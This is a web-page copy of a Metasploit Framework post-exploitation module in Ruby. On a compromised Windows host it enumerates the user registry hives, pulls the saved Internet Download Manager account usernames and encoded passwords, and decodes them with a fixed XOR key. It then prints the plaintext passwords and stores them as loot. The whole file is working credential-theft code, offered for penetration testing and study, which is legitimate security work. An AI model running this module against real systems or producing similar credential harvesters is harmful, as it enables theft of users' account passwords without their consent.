Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/idm.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Windows::Registry

8
  include Msf::Auxiliary::Report

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Windows Gather Internet Download Manager (IDM) Password Extractor',

15
        'Description' => %q{

16
          This module recovers the saved premium download account passwords from

17
          Internet Download Manager (IDM). These passwords are stored in an encoded

18
          format in the registry. This module traverses through these registry entries

19
          and decodes them. Thanks to the template code of theLightCosine's CoreFTP

20
          password module.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',

25
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com

26
        ],

27
        'Platform' => [ 'win' ],

28
        'SessionTypes' => [ 'meterpreter' ],

29
        'Notes' => {

30
          'Stability' => [CRASH_SAFE],

31
          'SideEffects' => [],

32
          'Reliability' => []

33
        }

34
      )

35
    )

36
  end

37


38
  def run

39
    creds = Rex::Text::Table.new(

40
      'Header' => 'Internet Downloader Manager Credentials',

41
      'Indent' => 1,

42
      'Columns' =>

43
      [

44
        'User',

45
        'Password',

46
        'Site'

47
      ]

48
    )

49


50
    registry_enumkeys('HKU').each do |k|

51
      next unless k.include?('S-1-5-21')

52
      next if k.include?('_Classes')

53


54
      print_status("Looking at Key #{k}")

55


56
      begin

57
        subkeys = registry_enumkeys("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\")

58


59
        if subkeys.nil? || subkeys.empty?

60
          print_status('IDM not installed for this user.')

61
          next

62
        end

63


64
        subkeys.each do |site|

65
          user = registry_getvaldata("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\#{site}", 'User')

66
          epass = registry_getvaldata("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\#{site}", 'EncPassword')

67
          next if epass.nil? || (epass == '')

68


69
          pass = xor(epass)

70
          print_good("Site: #{site} (User=#{user}, Password=#{pass})")

71
          creds << [user, pass, site]

72
        end

73


74
        print_status('Storing data...')

75
        path = store_loot(

76
          'idm.user.creds',

77
          'text/csv',

78
          session,

79
          creds.to_csv,

80
          'idm_user_creds.csv',

81
          'Internet Download Manager User Credentials'

82
        )

83
        print_good("IDM user credentials saved in: #{path}")

84
      rescue StandardError => e

85
        print_error("An error has occurred: #{e}")

86
      end

87
    end

88
  end

89


90
  def xor(ciphertext)

91
    pass = ciphertext.unpack('C*')

92
    key = 15

93
    for i in 0..pass.length - 1 do

94
      pass[i] ^= key

95
    end

96
    return pass.pack('C*')

97
  end

98
end

99


100